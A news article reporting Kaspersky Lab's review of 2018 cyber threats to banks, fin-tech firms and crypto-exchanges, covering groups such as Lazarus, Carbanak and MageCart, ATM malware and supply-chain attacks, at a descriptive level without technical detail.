The past year has been extremely eventful in terms of the digital threats faced by financial institutions: cyber crimegroups have used new infiltration techniques, and the geography of attacks has become more extensive.
According to the KSN statistics by Kaspersky Lab , the Middle East, Turkey and Africa (META) region witnessed 17% increase in banking malware attack to reach almost half a million attacks in 2018.
Cryptocurrencies have also become an established part of many people’s lives, and a more attractive target for cybercriminals across the world, which resulted in a rapid increase in malicious mining of cryptocurrencies.
The past year has been extremely eventful in terms of the digital threats faced by financial institutions: cybercrimegroups have used new infiltration techniques, and the geography of attacks has become more extensive.
Some of the key highlight events of cyber threats to financial institutions in 2018 include:
Arrest of well-known cybercrime group members
In 2018 police arrested a number of well-known cybercrimegroup members responsible for Carbanak/Cobalt and Fin7, among others. These groups have been involved in attacks on dozens, if not hundreds of companies and financial institutions around the world. Unfortunately, the arrest of group members including the leader of Carbanak, did not lead to a complete halt in activities – in fact, it seemingly started the process of splitting the groups into smaller cells.
The most active actor of 2018 was Lazarus. This group is gradually expanding its arsenal of tools and looking for new targets. The area of interest today includes banks, fin-tech companies, crypto-exchanges, PoS terminals, ATMs, and in terms of geography, we have recorded infection attempts in dozens of countries, most of which are located in Asia, Africa and Latin America.
YOU MAY ALSO READ: Russian hackers Hit 10 Banks across the World with Silence Malware
Young fin-tech companies and crypto-exchanges are at a higher risk
At the end of last year, Kaspersky Lab noted that young fin-tech companies and crypto-exchanges are at a higher risk, due to the immaturity of their security systems. This certain type of companies was targeted most often.
The most creative attack seen in 2018, from our point of view, was AppleJeus, which targeted cryptocurrency traders. In this case, criminals created special software that looked legitimate and carried out legitimate functions. However, the program also uploaded a malicious update that turned out to be a backdoor. This is a new type of attack, which infects its targets via the supply chain.
Continuing the topic of supply chain attacks, it is worth mentioning the MageCart group, which, by infecting website payment pages (including those of large companies such as British Airways) was able to access a huge amount of payment card data this year. This attack was even more effective because the criminals chose an interesting target – Magento, which is one of the most popular platforms for online stores. Using vulnerabilities in Magento, criminals were able to infect dozens of sites in a technique that is likely to be used by several other groups.
ATM malware families
Kaspersky Lab also noted the development of ATM malware families. In 2018, Kaspersky Lab specialists discovered six new families, meaning that there are now more than 20 of this kind. Some ATM malware families have also evolved: for example, the Plotus malware from Latin America has been updated to a new version, Peralda, and has gained new functionality as a result. The greatest damage associated with attacks on ATMs was caused by infections from internal banking networks, such as FASTCash and ATMJackPot, which allowed attackers to reach thousands of ATMs.
Attacks on organizations that use banking systems
2018 also saw attacks on organizations that use banking systems. Firstly, Kaspersky Lab machine learning-based behavioral analysis system detected several waves of malicious activity related to the spread of the Buhtrap banking Trojan this year, as attackers embedded their code in popular news sites and forums.
Secondly, Kaspersky Lab detected attacks on the financial departments of industrial companies, where payments of hundreds of thousands of dollars would not cause much suspicion. Often in the final stages of attacks like this, attackers install remote administration tools on infected computers such as RMS, TeamViewer, and VNC.